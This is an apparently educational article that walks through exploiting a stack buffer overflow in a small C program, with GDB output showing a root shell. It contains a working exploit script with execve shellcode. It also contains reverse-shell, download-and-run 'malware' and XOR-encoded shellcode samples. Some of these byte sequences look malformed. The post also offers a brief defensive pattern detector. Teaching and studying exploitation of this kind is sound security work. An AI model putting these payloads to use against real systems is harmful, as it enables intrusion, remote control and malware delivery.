Buffer Overflow Vulnerability Deep Dive (Part 1): From Principles to Practical Exploitation

Buffer Overflow Fundamentals

What is a Buffer Overflow

A buffer overflow is a common software security vulnerability that occurs when a program writes more data to a fixed-size buffer than the buffer can hold. This vulnerability can lead to:

Memory Corruption: Overwriting adjacent memory regions
Program Crash: Disrupting the normal execution flow of the program
Code Execution: Attackers may gain control of the program

Memory Layout in C

In a C program, memory is typically divided into the following regions:

bash
High Address
+------------------+
|       Stack      |  ← Function calls, local variables
|       ↓          |
+------------------+
|       ...        |
+------------------+
|       ↑          |
|      Heap        |  ← Dynamically allocated memory
+------------------+
|BSS(Uninitialized)|
+------------------+
| Data(Initialized)|
+------------------+
|     Code Segment |
+------------------+
Low Address

Stack Frame Structure

Each function call creates a stack frame on the stack:

bash
High Address
+--------------------+
| Function Arguments |
+--------------------+
|     Return Address |  ← Key attack target
+--------------------+
|      Saved EBP     |
+--------------------+
| Local Variables    |  ← Buffer location
+--------------------+
Low Address

When a buffer overflow occurs, data may overwrite the return address, thereby controlling the program's execution flow.

Vulnerable Code Analysis

Target Program Code

c
#include <stdio.h>
#include <string.h>

int copy(char *str) {
    char buffer[100];        // 100-byte local buffer
    // unsafe!
    strcpy(buffer, str);     // Dangerous string copy operation
    return 0;               // Added return value
}

int main(int argc, char *argv[]) {
    copy(argv[1]);          // Pass command-line argument to copy function
    return 0;
}

Vulnerability Analysis

This simple C program contains a typical buffer overflow vulnerability:

Vulnerability: The strcpy(buffer, str) function does not check the length of the source string
Buffer Size: The buffer array is only 100 bytes
Attack Vector: If argv[1] is 100 characters or longer, the copy runs past the end of buffer, because strcpy also writes the terminating null byte
Impact: The overflowing data will overwrite other data on the stack, including the return address

Memory Layout Analysis

When the copy function is called, the stack layout is roughly as follows:

bash
High Address
+--------------------+
|    argv[1] pointer |  ← Argument of main function
+--------------------+
|copy Return Address |  ← Attack target!
+--------------------+
|      Saved EBP     |
+--------------------+
|   buffer[99]       |
|   buffer[98]       |
|      ...           |  ← 100-byte buffer
|   buffer[1]        |
|   buffer[0]        |  ← ESP points nearby
+--------------------+
Low Address

When the input exceeds the buffer, the excess data runs upward through any compiler-inserted padding, then the saved EBP, and finally the return address.
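The overwrite can be modelled with a small Python simulation. This is a sketch rather than real process memory: the frame is a plain bytearray, the 8 bytes of padding between buffer and the saved EBP are an assumption (the real amount depends on the compiler and flags), the stored addresses are made up, and `unchecked_copy` and `bounded_copy` are hypothetical stand-ins for strcpy and a length-limited copy.

```python
# Simulated stack frame for copy(); all offsets and values are illustrative.
BUF_SIZE = 100
PAD_SIZE = 8                      # assumed compiler padding, varies by build
SAVED_EBP = slice(BUF_SIZE + PAD_SIZE, BUF_SIZE + PAD_SIZE + 4)
RET_ADDR = slice(SAVED_EBP.stop, SAVED_EBP.stop + 4)
ORIGINAL_RET = 0x08049ABC         # made-up return address into main


def new_frame():
    """Return a fresh frame: buffer, padding, saved EBP, return address."""
    frame = bytearray(RET_ADDR.stop)
    frame[SAVED_EBP] = (0xFFFFDD68).to_bytes(4, "little")  # made-up value
    frame[RET_ADDR] = ORIGINAL_RET.to_bytes(4, "little")
    return frame


def unchecked_copy(frame, src):
    """Like strcpy: copy up to the terminator and ignore BUF_SIZE."""
    data = src.split(b"\x00", 1)[0] + b"\x00"
    frame[0:len(data)] = data


def bounded_copy(frame, src):
    """Length-limited copy: truncate to the buffer and always terminate."""
    data = src.split(b"\x00", 1)[0][:BUF_SIZE - 1] + b"\x00"
    frame[0:len(data)] = data


def ret_addr(frame):
    """Read the simulated return address as a little-endian integer."""
    return int.from_bytes(frame[RET_ADDR], "little")


overflowed = new_frame()
unchecked_copy(overflowed, b"A" * 112 + b"B" * 4)
print(hex(ret_addr(overflowed)))   # return address replaced by 'BBBB'

intact = new_frame()
bounded_copy(intact, b"A" * 112 + b"B" * 4)
print(hex(ret_addr(intact)))       # original return address preserved
```

The bounded variant is the shape of the usual fix: the copy is limited by the size of the destination, not by the length of the source.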

Extended Vulnerability Examples

To show that buffer overflows are not limited to return addresses, here are two further examples written for this article. They follow attack patterns similar to those of real-world CVEs:

Example 2: User Authentication System Vulnerability (Similar to CVE-2024-28219 Pattern)

c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

typedef struct {
    char username[32];
    char password[32]; 
    int is_admin;
} UserCredentials;

int authenticate_user(const char* user_input, const char* pass_input) {
    UserCredentials creds;
    creds.is_admin = 0;  // Default non-administrator privileges
    
    // Unbounded copies: either field can overflow into the is_admin field
    strcpy(creds.username, user_input);
    strcpy(creds.password, pass_input);
    
    printf("Username: %s\n", creds.username);
    printf("Administrator privileges: %s\n", creds.is_admin ? "Yes" : "No");
    
    return creds.is_admin;
}

int main(int argc, char *argv[]) {
    if (argc != 3) {
        printf("Usage: %s <username> <password>\n", argv[0]);
        return 1;
    }
    
    if (authenticate_user(argv[1], argv[2])) {
        printf("🔓 Administrator privileges obtained!\n");
        system("/bin/sh");
    } else {
        printf("❌ Authentication failed\n");
    }
    
    return 0;
}

Vulnerability Analysis:

Structure Layout: The username and password fields are adjacent to the is_admin field
Overflow Point: A password of 33 or more characters, or a username of 65 or more, writes non-zero bytes into is_admin; this is the same kind of missing bounds check on strcpy seen in CVE-2024-28219
Attack Effect: Overwrites is_admin from 0 to a non-zero value, gaining administrator privileges
Real-world Correspondence: This type of vulnerability is common in authentication systems, where attackers modify key flag bits by precisely controlling input length
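The field offsets behind this analysis can be checked with Python's ctypes module. The sketch below mirrors the struct from the listing and simulates the unchecked password copy inside the struct's own memory; `field_offsets` and `simulate_password_copy` are hypothetical helper names, and the layout reported is that of the machine running Python, which for this struct is assumed to match the 32-bit target.

```python
import ctypes


class UserCredentials(ctypes.Structure):
    """Mirror of the C struct; field sizes follow the listing."""
    _fields_ = [
        ("username", ctypes.c_char * 32),
        ("password", ctypes.c_char * 32),
        ("is_admin", ctypes.c_int),
    ]


def field_offsets(struct_type):
    """Map each field name to its byte offset inside the struct."""
    return {name: getattr(struct_type, name).offset
            for name, _ in struct_type._fields_}


def simulate_password_copy(creds, pass_input):
    """Write pass_input plus a terminator at the password field, unchecked.

    The write is refused if it would leave the struct, so the simulation
    itself stays memory-safe.
    """
    data = pass_input + b"\x00"
    start = UserCredentials.password.offset
    if start + len(data) > ctypes.sizeof(creds):
        raise ValueError("would write outside the simulated struct")
    ctypes.memmove(ctypes.addressof(creds) + start, data, len(data))


print(field_offsets(UserCredentials))

creds = UserCredentials()
simulate_password_copy(creds, b"p" * 32 + b"\x01")  # 33 characters
print("is_admin is now non-zero:", creds.is_admin != 0)
```

A password of up to 31 characters leaves is_admin untouched; the 33rd character is the first byte that lands on the flag.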

Example 3: Network Data Handling Vulnerability (Similar to CVE-2023-6549 Pattern)

c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

typedef struct {
    uint32_t packet_length;
    char data_buffer[256];
    void (*process_callback)(char*);
} NetworkPacket;

void safe_handler(char* data) {
    printf("Safe handling: %s\n", data);
}

void dangerous_handler(char* data) {
    printf("🚨 Dangerous handler function called!\n");
    system(data);
}

int process_network_data(const char* raw_data, uint32_t length) {
    NetworkPacket packet;
    packet.process_callback = safe_handler;  // Default safe handler function
    
    printf("Processing a packet of length %u\n", length);
    
    // Incorrect bound: the check allows up to 511 bytes, but data_buffer holds only 256
    if (length > 0 && length < 512) {  // Seemingly safe check
        memcpy(packet.data_buffer, raw_data, length);
        packet.process_callback(packet.data_buffer);
    }
    
    return 0;
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <data>\n", argv[0]);
        return 1;
    }
    
    uint32_t data_len = strlen(argv[1]);
    process_network_data(argv[1], data_len);
    
    return 0;
}

Vulnerability Analysis:

Function Pointer Overwrite: Overly long data can overwrite the process_callback function pointer
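Length Check Flaw: The check accepts lengths up to 511 although data_buffer holds only 256 bytes, so the check passes and memcpy still overflows. Real-world bugs often reach the same state through integer wraparound, as with the integer underflow in CVE-2022-0185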
Attack Vector: Carefully constructed input can point the function pointer to dangerous_handler
Real-world Correspondence: This pattern is common in network protocol handling; CVE-2023-6549 triggered a buffer overflow in NetScaler through a similar method
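How far a given length reaches into the function pointer can be worked out from the struct layout. The sketch below uses ctypes with `c_void_p` standing in for the function pointer; `bytes_into_callback` is a hypothetical helper, and the offsets printed are those of the platform running Python (the pointer sits at offset 260 on a typical 32-bit build and 264 on a typical 64-bit one).

```python
import ctypes


class NetworkPacket(ctypes.Structure):
    """Mirror of the C struct from the listing."""
    _fields_ = [
        ("packet_length", ctypes.c_uint32),
        ("data_buffer", ctypes.c_char * 256),
        ("process_callback", ctypes.c_void_p),  # stands in for the function pointer
    ]


data_off = NetworkPacket.data_buffer.offset
cb_off = NetworkPacket.process_callback.offset
ptr_size = ctypes.sizeof(ctypes.c_void_p)


def bytes_into_callback(length):
    """Number of bytes of a `length`-byte memcpy that land on the pointer."""
    end = data_off + length
    return max(0, min(end, cb_off + ptr_size) - cb_off)


def length_is_safe(length):
    """The bound the check should have used: the size of data_buffer."""
    return 0 < length <= ctypes.sizeof(ctypes.c_char * 256)


for length in (256, 300, 511):
    print(length, "passes original check:", 0 < length < 512,
          "| safe:", length_is_safe(length),
          "| pointer bytes overwritten:", bytes_into_callback(length))
```

Every length between 257 and 511 passes the original check yet is rejected by a bound tied to the buffer size.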

Compilation Settings and Environment Preparation

Compilation Parameter Analysis

bash

# Compile the vulnerable program
gcc -m32 -std=c99 -g -fno-stack-protector -z execstack -no-pie -o vul vul.c

The role of each compilation parameter:

-m32: Generate a 32-bit executable file, simplifying memory address calculations
-std=c99: Compile using the C99 standard
-g: Include debugging information for easier debugging with GDB
-fno-stack-protector: Disable stack protection mechanism (canary)
-z execstack: Allow the stack area to be executable, allowing shellcode to run
-no-pie: Disable position-independent executable files, fixing the program loading address

System Security Mechanism Configuration

bash
# Disable Address Space Layout Randomization (ASLR)
root@softsec2:/home/toor/sample# echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0

ASLR (Address Space Layout Randomization):

Normally, memory addresses are randomized each time a program runs
Disabling ASLR makes stack addresses, heap addresses, and library addresses predictable
This allows attackers to accurately calculate jump addresses
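Before and after a lab session it is worth confirming which ASLR mode is active. The sketch below reads the same /proc entry that the command above writes and translates the value; `describe_aslr` and `current_aslr` are hypothetical helper names, and on systems without this file the function only reports that it is unavailable.

```python
from pathlib import Path

# Meanings of /proc/sys/kernel/randomize_va_space on Linux.
ASLR_MODES = {
    0: "disabled",
    1: "partial: stack, mmap regions, and shared libraries are randomized",
    2: "full: as mode 1, plus the heap (brk) is randomized",
}


def describe_aslr(raw: str) -> str:
    """Translate the file's content into a readable description."""
    value = int(raw.strip())
    return ASLR_MODES.get(value, f"unknown value {value}")


def current_aslr(path="/proc/sys/kernel/randomize_va_space") -> str:
    """Describe the running system's setting, if the file exists."""
    entry = Path(path)
    if not entry.exists():
        return "not available on this system"
    return describe_aslr(entry.read_text())


print(current_aslr())
```

Writing 2 back to the same file restores full randomization once the experiment is finished.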

Vulnerability Exploitation Process

Step 1: Determine the Overflow Point

python
#!/usr/bin/python3
# exploit_step1.py - Test basic overflow
import sys

# Send 112 'A' characters + 4 'B' characters
# 112 bytes fill the buffer, 4 bytes overwrite the return address
sys.stdout.buffer.write(b'A' * 112 + b'B' * 4)

Principle Analysis:

112 'A's: Fill the 100-byte buffer + 12 bytes of padding (alignment and saved EBP)
4 'B's: Overwrite the 4-byte return address
When the program attempts to return, it will jump to address 0x42424242 ('BBBB' in hexadecimal)
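The value 112 was given here without derivation. One common way to find such an offset, sketched below under the assumption that the crash value of EIP can be read from a debugger, is to send a non-repeating pattern instead of a run of 'A's and look up the four bytes that end up in EIP. `make_pattern` and `offset_of_eip` are hypothetical helper names; the crash value is simulated from the pattern itself rather than taken from a real run.

```python
import string


def make_pattern(length):
    """Build an 'Aa0Aa1Aa2...' pattern in which a 4-byte window marks its position."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds what this pattern can cover")


def offset_of_eip(eip_value, pattern):
    """Find the bytes seen in EIP (stored little-endian) inside the pattern."""
    return pattern.find(eip_value.to_bytes(4, "little"))


pattern = make_pattern(200)

# Simulated crash: pretend the return address was taken from offset 112.
crash_eip = int.from_bytes(pattern[112:116], "little")
print(hex(crash_eip), "-> offset", offset_of_eip(crash_eip, pattern))
```

With the offset known, the 'A' * 112 + 'B' * 4 test then serves as confirmation.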

Test Run Results

bash
# Generate attack payload
python3 exploit_step1.py > payload1

# Run test
./vul $(cat payload1)

If successful, the program will crash because it attempts to jump to the invalid address 0x42424242, proving that we have controlled the program's execution flow.

bash
(gdb) list
warning: Source file is more recent than executable.
1       #include <stdio.h>
2       #include <string.h>
3       int copy(char *str) {
4           char buffer[100];
5           // unsafe!
6           strcpy(buffer, str);
7       }
8       int main(int argc, char *argv[]) {
9           copy(argv[1]);
10          return 0;
(gdb) b 6
Breakpoint 1 at 0x8049187: file vul.c, line 6.
(gdb) run $(cat out_boom)
Starting program: /home/toor/sample/vul $(cat out_boom)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, copy (str=0xffffdf42 'A' <repeats 112 times>, "BBBB") at vul.c:6
6           strcpy(buffer, str);
(gdb) n
7       }
(gdb) x/x $esp
0xffffdcd0:     0xf7ffd000
(gdb) x/40x $esp
0xffffdcd0:     0xf7ffd000      0x00000020      0x00000000      0x41414141
0xffffdce0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdcf0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd00:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd10:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd20:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd30:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffdd40:     0x41414141      0x41414141      0x41414141      0x42424242
0xffffdd50:     0xffffdf00      0xf7fbe66c      0xf7fbeb10      0x080491b7
0xffffdd60:     0x00000001      0xffffdd80      0xf7ffd020      0xf7da7519
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

Step 1 Test Success Analysis:

Input Data Confirmation: GDB shows that the string passed in is 112 'A' characters plus 4 'B' characters
Memory Overwrite Verification:
- 0xffffdcdc - 0xffffdd4b: 28 words of 0x41414141 ('AAAA') fill the buffer, the padding, and the saved EBP (112 bytes, starting at the fourth word of the first row)
- 0xffffdd4c: The next word is 0x42424242 ('BBBB'); this is the slot that held the function's return address
Attack Effect Confirmation:
- The program attempts to return to address 0x42424242, which is not a valid memory address
- The system generates a segmentation fault (SIGSEGV), and the program crashes
- This proves that we have successfully controlled the program's execution flow

This test confirms:

The exact location of the overflow point: 112 bytes of padding + 4 bytes of return address overwrite
We can precisely control the value of the EIP register
Next, we can replace 0x42424242 with the actual address pointing to the shellcode
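The 112-byte offset can be cross-checked against the dump itself. The short calculation below takes two row addresses from the x/40x output and assumes only that each row holds four 4-byte words.

```python
# Row addresses read from the x/40x dump.
ROW_WITH_FIRST_A = 0xFFFFDCD0   # row whose fourth word is the first 0x41414141
ROW_WITH_B = 0xFFFFDD40         # row whose fourth word is 0x42424242
WORD = 4

buffer_start = ROW_WITH_FIRST_A + 3 * WORD   # fourth word in its row
ret_slot = ROW_WITH_B + 3 * WORD             # fourth word in its row
offset = ret_slot - buffer_start

print(f"buffer starts at {buffer_start:#x}")
print(f"return address slot at {ret_slot:#x}")
print(f"distance: {offset} bytes")
```

The distance matches the padding length used in exploit_step1.py, and buffer_start is the address range a later payload has to aim for.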

Step 2: Constructing the Attack Payload

NOP Sled Technique

NOP (No Operation) is an assembly instruction (machine code: \x90), which does nothing when executed, only incrementing the program counter. A NOP sled is a technique to improve the success rate of an attack:

python
#!/usr/bin/python3
# exploit_final.py - Complete attack payload
import sys

# NOP sled: 64 bytes of NOP instructions
# Function: Even if the jump address is not accurate enough, it can "slide" to the shellcode
nopsled = b'\x90' * 64

# Shellcode: call setuid(0), then execve a shell
shellcode = (
    b'\x31\xc0\x89\xc3\xb0\x17\xcd\x80' +   # setuid(0) system call
    b'\x31\xd2\x52\x68\x6e\x2f\x73\x68' +   # Push a null terminator and "n/sh"
    b'\x68\x2f\x2f\x62\x69\x89\xe3\x52' +   # Push "//bi"; EBX now points to "//bin/sh"
    b'\x53\x89\xe1\x8d\x42\x0b\xcd\x80'     # Build argv, set EAX = 11, execve system call
)

# Calculate the number of padding bytes: Total length 112 - NOP sled 64 - shellcode length 32 = 16
padding = b'A' * (112 - 64 - 32)

# Return address: Jump to a certain location in the NOP sled area
eip = b"\xF0\xDC\xFF\xFF"  # An address on the stack

# Assemble the final payload: NOP sled + shellcode + padding + return address
sys.stdout.buffer.write(nopsled + shellcode + padding + eip)

Shellcode Analysis

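This shellcode tries to switch to root and then starts a shell:

setuid(0): Requests user ID 0 (root). The call succeeds only if the process is already privileged, for example a setuid-root binary or a program started by root
String Construction: Builds the string "//bin/sh" on the stack (the doubled slash pads the path to 8 bytes and is harmless)
execve("//bin/sh"): Replaces the process with the shell program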

Machine Code Analysis:

\x31\xc0: xor eax, eax - Clears EAX
\x89\xc3: mov ebx, eax - Sets EBX to 0
\xb0\x17: mov al, 0x17 - setuid system call number (23)
\xcd\x80: int 0x80 - Triggers the system call
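The eip value in exploit_final.py is written byte by byte in reverse because x86 stores integers in little-endian order. A less error-prone way to produce it, sketched here with the standard struct module, is to pack the address and check it for bytes that strcpy would not carry; `pack_addr` and `has_bad_bytes` are hypothetical helper names.

```python
import struct


def pack_addr(addr):
    """Encode a 32-bit address the way it is laid out in x86 memory."""
    return struct.pack("<I", addr)


def has_bad_bytes(data, bad=b"\x00"):
    """True if data contains a byte that would cut a strcpy copy short."""
    return any(b in bad for b in data)


eip = pack_addr(0xFFFFDCF0)
print(eip)                                    # same bytes as the hand-written eip
print(hex(struct.unpack("<I", eip)[0]))       # round trip back to the address
print("contains null byte:", has_bad_bytes(eip))
print("0x08049100 contains null byte:", has_bad_bytes(pack_addr(0x08049100)))
```

The second check shows why some target addresses cannot be delivered through a string copy at all.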

Extended Shellcode Analysis

In addition to the basic shellcode that starts a shell, attackers may also use other types of payloads. Here are some common shellcode variations:

Reverse Connection Shellcode

This shellcode establishes a connection to a server controlled by the attacker:

python
# Reverse connection shellcode (connects to 192.168.1.100:4444)
reverse_shell = (
    b'\x31\xc0\x31\xdb\x31\xc9\x31\xd2' +   # Clear registers
    b'\xb0\x66\xb3\x01\x51\x53\x6a\x02' +   # socket(AF_INET, SOCK_STREAM, 0)
    b'\x89\xe1\xcd\x80\x89\xc6\xb0\x66' +   # Call system call, save socket fd
    b'\xb3\x03\x68\x64\x01\xa8\xc0\x66' +   # Construct sockaddr structure (IP: 192.168.1.100)
    b'\x68\x11\x5c\x66\x53\x89\xe1\x6a' +   # Port 4444, AF_INET
    b'\x10\x51\x56\x89\xe1\xcd\x80\x31' +   # connect() system call
    b'\xc9\xb1\x03\xb0\x3f\x49\x89\xf3' +   # Loop dup2() redirect stdin/stdout/stderr
    b'\xcd\x80\x75\xf8\x31\xc0\x50\x68' +   # 
    b'\x2f\x2f\x73\x68\x68\x2f\x62\x69' +   # Construct "/bin/sh" string
    b'\x89\xe3\x50\x53\x89\xe1\xb0\x0b' +   # execve("/bin/sh")
    b'\xcd\x80'                             # Execute shell
)

Reverse Connection Shellcode Analysis:

Create Socket: Uses the socket() call (issued through socketcall, system call 0x66 on 32-bit x86) to create a TCP socket
Connect to Attacker: Connects to the specified IP address and port
Redirect IO: Redirects stdin/stdout/stderr to the socket
Execute Shell: Starts the shell, enabling remote control

Download and Execute Shellcode

This shellcode downloads and executes a file from a remote server:

python
# Download and execute shellcode example
download_exec = (
    b'\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68' +   # execve preparation
    b'\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x2d\x63' +   # "/bin/sh", "-c" parameter
    b'\x00\x00\x89\xe6\x52\x68\x67\x65\x74\x20\x68' +   # "wget " command
    b'\x77\x67\x65\x74\x20\x89\xe7\x52\x68\x74\x70' +   # Construct wget command
    b'\x3a\x2f\x2f\x68\x68\x74\x74\x70\x3a\x2f\x2f' +   # "http://"
    b'\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31' +   # IP address string
    b'\x30\x30\x2f\x6d\x61\x6c\x77\x61\x72\x65\x20' +   # "/malware "
    b'\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x2b\x78' +   # "&& chmod +x"
    b'\x20\x6d\x61\x6c\x77\x61\x72\x65\x20\x26\x26' +   # " malware &&"
    b'\x20\x2e\x2f\x6d\x61\x6c\x77\x61\x72\x65'        # " ./malware"
)

Fileless Attack Shellcode

Executes code directly in memory, leaving no file traces:

c
// Memory execution shellcode framework
char memory_exec_template[] = 
    // Allocate executable memory
    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"     // Clear registers
    "\xb8\xc0\x00\x00\x00"                 // mmap2 system call number (192 on 32-bit x86; 0x7d would be mprotect)
    "\x31\xdb"                             // addr = NULL
    "\xb9\x00\x10\x00\x00"                 // length = 4096
    "\xba\x07\x00\x00\x00"                 // prot = PROT_READ|WRITE|EXEC
    "\xbe\x22\x00\x00\x00"                 // flags = MAP_PRIVATE|ANONYMOUS
    "\xbf\xff\xff\xff\xff"                 // fd = -1
    "\x31\xed"                             // offset = 0
    "\xcd\x80"                             // int 0x80
    
    // Copy subsequent code to newly allocated memory
    "\x89\xc3"                             // Save the address returned by mmap
    "\x31\xc9"                             // Clear counter
    "\xeb\x0c"                             // Jump to payload
    
    // Insert actual payload code here...
    ;

Shellcode Encoding Techniques

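Shellcode often needs to be encoded, both to remove bytes that the vulnerable copy would mangle (strcpy, for example, stops at the first null byte) and to evade signature-based intrusion detection: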

python
def xor_encode_shellcode(shellcode, key=0xAA):
    """Simple XOR encoding example"""
    encoded = bytearray()
    for byte in shellcode:
        encoded.append(byte ^ key)
    
    # Add decoding stub
    decoder_stub = (
        b'\xeb\x11'                    # jmp short 0x13 (jump over encoded data)
        b'\x5e'                        # pop esi (get shellcode address)
        b'\x31\xc9'                    # xor ecx, ecx (clear counter)
        b'\xb1' + bytes([len(encoded)]) # mov cl, <length>
        b'\x80\x36' + bytes([key])     # xor byte ptr [esi], <key>
        b'\x46'                        # inc esi
        b'\xe2\xfb'                    # loop decoding loop
        b'\xeb\x05'                    # jmp short +5 (jump to decoded shellcode)
        b'\xe8\xea\xff\xff\xff'       # call back to decoder
    )
    
    return decoder_stub + encoded

# Usage example
original_shellcode = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'
encoded = xor_encode_shellcode(original_shellcode)
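
Two properties of single-byte XOR encoding matter when reading or detecting such payloads, and both can be shown on harmless sample bytes. The sketch below uses hypothetical helpers `xor_bytes` and `null_positions`; it contains no decoder stub and is not tied to the listing's stub.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key."""
    return bytes(b ^ key for b in data)


def null_positions(encoded: bytes) -> list:
    """Indexes of null bytes in the encoded output."""
    return [i for i, b in enumerate(encoded) if b == 0]


sample = b"example \xaa bytes"
key = 0xAA

encoded = xor_bytes(sample, key)

# Property 1: XOR is its own inverse, so the same key decodes the data.
print(xor_bytes(encoded, key) == sample)

# Property 2: any input byte equal to the key encodes to 0x00, which
# would reintroduce the null byte the encoding was meant to avoid.
print(null_positions(encoded))

# Property 3: a one-byte length field (as in `mov cl, <length>`) limits
# the encoded data to 255 bytes.
print(len(encoded) <= 255)
```

For defenders, the first property means a scanner can brute-force all 256 keys and rescan the result for known patterns.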

Shellcode Detection and Protection

Understanding how shellcode works helps implement effective protection measures:

Feature Detection

python
def detect_shellcode_patterns(data):
    """Detect common shellcode patterns"""
    suspicious_patterns = [
        b'\x31\xc0',          # xor eax, eax
        b'\xcd\x80',          # int 0x80
        b'\x2f\x62\x69\x6e', # "/bin"
        b'\x2f\x73\x68',      # "/sh"
        b'\x90' * 10,         # NOP sled
    ]
    
    detections = []
    for pattern in suspicious_patterns:
        if pattern in data:
            detections.append(f"Detected suspicious pattern: {pattern.hex()}")
    
    return detections
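
Substring matching of this kind is cheap but noisy. The sketch below is a variant that also reports where each pattern occurs, run on synthetic inputs to show both a true hit and a false positive; `find_pattern_offsets` and the `PATTERNS` table are hypothetical names, and the inputs are made up for illustration.

```python
def find_pattern_offsets(data: bytes, patterns: dict) -> dict:
    """Return {pattern name: [offsets]} for every pattern found in data."""
    hits = {}
    for name, pattern in patterns.items():
        offsets = []
        start = data.find(pattern)
        while start != -1:
            offsets.append(start)
            start = data.find(pattern, start + 1)
        if offsets:
            hits[name] = offsets
    return hits


PATTERNS = {
    "int 0x80": b"\xcd\x80",
    "/sh": b"/sh",
    "NOP run": b"\x90" * 10,
}

benign = b"GET /index.html HTTP/1.1\r\n"
false_positive = b"/usr/share/doc"                 # harmless path containing "/sh"
suspicious = b"\x90" * 12 + b"\xcd\x80" + b"/sh"   # synthetic test bytes

for label, data in [("benign", benign),
                    ("false positive", false_positive),
                    ("suspicious", suspicious)]:
    print(label, find_pattern_offsets(data, PATTERNS))
```

Short patterns such as "/sh" or a two-byte opcode match ordinary data often, so a practical detector would weight several hits occurring close together rather than alert on any single one.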

GDB Debugging Analysis

Setting Breakpoints and Running

bash

(gdb) list
warning: Source file is more recent than executable.
1       #include <stdio.h>
2       #include <string.h>
3       int copy(char *str) {
4           char buffer[100];
5           // unsafe!
6           strcpy(buffer, str);
7       }
8       int main(int argc, char *argv[]) {
9           copy(argv[1]);
10          return 0;

# Set breakpoint at strcpy function
(gdb) b 6
Breakpoint 1 at 0x8049187: file vul.c, line 6.

# Run the program with the attack payload
(gdb) run $(python3 exploit_final.py)
Starting program: /home/toor/sample/vul $(python3 exploit_final.py)
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, copy (str=0xffffdf42 '\220' <repeats 64 times>, "\061\300\211\303\260\027\315\200\061\322Rhn/shh//bi\211\343RS\211\341\215B\v\315\200", 'A' <repeats 16 times>, "\360\334\377\377") at vul.c:6
6           strcpy(buffer, str);

# Execute strcpy operation
(gdb) n
7       }

Debugging Information Interpretation:

GDB shows the content of the string passed in, starting with the NOP sled (\220 repeated 64 times; \220 is octal for 0x90)
Then comes the machine code of the shellcode
Then comes the padding character 'A' (16 times)
Finally, the return address \360\334\377\377 (the bytes f0 dc ff ff, which is 0xffffdcf0 in little-endian order)

Memory State Analysis

bash
# Check stack pointer location
(gdb) x/x $esp      
0xffffdcd0:     0xf7ffd000

# View 40 32-bit words (160 bytes) on the stack
(gdb) x/40x $esp
0xffffdcd0:     0xf7ffd000      0x00000020      0x00000000      0x90909090
0xffffdce0:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffdcf0:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffdd00:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffdd10:     0x90909090      0x90909090      0x90909090      0xc389c031
0xffffdd20:     0x80cd17b0      0x6852d231      0x68732f6e      0x622f2f68
0xffffdd30:     0x52e38969      0x8de18953      0x80cd0b42      0x41414141
0xffffdd40:     0x41414141      0x41414141      0x41414141      0xffffdcf0
0xffffdd50:     0xffffdf00      0xf7fbe66c      0xf7fbeb10      0x080491b7
0xffffdd60:     0x00000001      0xffffdd80      0xf7ffd020      0xf7da7519

Memory Analysis Details:

NOP Sled Area (0xffffdcdc - 0xffffdd1b):
- The buffer starts at the fourth word of the first row; the three words before it are not part of the payload
- 16 words of 0x90909090 hold the 64 NOP instructions
- Any return address inside this range leads to the shellcode, which gives the attack a large target area
Shellcode Area (0xffffdd1c - 0xffffdd3b):
- 0xc389c031: Beginning of shellcode (xor eax,eax; mov ebx,eax)
- 0x80cd17b0: mov al,0x17; int 0x80 (setuid system call)
- 0x6852d231 - 0x80cd0b42: execve system call related code
Padding Area (0xffffdd3c - 0xffffdd4b):
- 0x41414141: Padding character 'A'
Return Address Overwrite (0xffffdd4c):
- 0xffffdcf0: This is the return address we set, pointing to the NOP sled area
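The region boundaries follow mechanically from where the buffer starts and from the sizes used in exploit_final.py. The sketch below recomputes them, taking 0xffffdcdc (the first 0x90909090 word in the dump) as the buffer start; `layout` is a hypothetical helper name.

```python
BUFFER_START = 0xFFFFDCDC   # first 0x90909090 word in the dump
REGIONS = [
    ("nop sled", 64),
    ("shellcode", 32),
    ("padding", 16),
    ("return address", 4),
]


def layout(base, regions):
    """Return (name, first address, last address) for consecutive regions."""
    rows, addr = [], base
    for name, size in regions:
        rows.append((name, addr, addr + size - 1))
        addr += size
    return rows


table = layout(BUFFER_START, REGIONS)
for name, first, last in table:
    print(f"{name:15s} {first:#010x} - {last:#010x}")

# Check that the chosen return address falls inside the sled.
target = 0xFFFFDCF0
_, sled_first, sled_last = table[0]
print("target inside sled:", sled_first <= target <= sled_last)
print("NOPs skipped before landing:", target - sled_first)
```

The landing point sits 20 bytes into the sled, so the stack may shift by up to 20 bytes in one direction or 43 in the other before the jump misses.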

Executing the Attack Payload

bash
# Continue executing the program
(gdb) c
Continuing.

# The program successfully executes the shellcode, starting a new shell
process 10920 is executing new program: /usr/bin/dash
Error in re-setting breakpoint 1: No source file named /home/toor/sample/vul.c.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

# Test privileges - successfully obtained root privileges!
# whoami
[Detaching after vfork from child process 10982]
root

Attack Success Analysis:

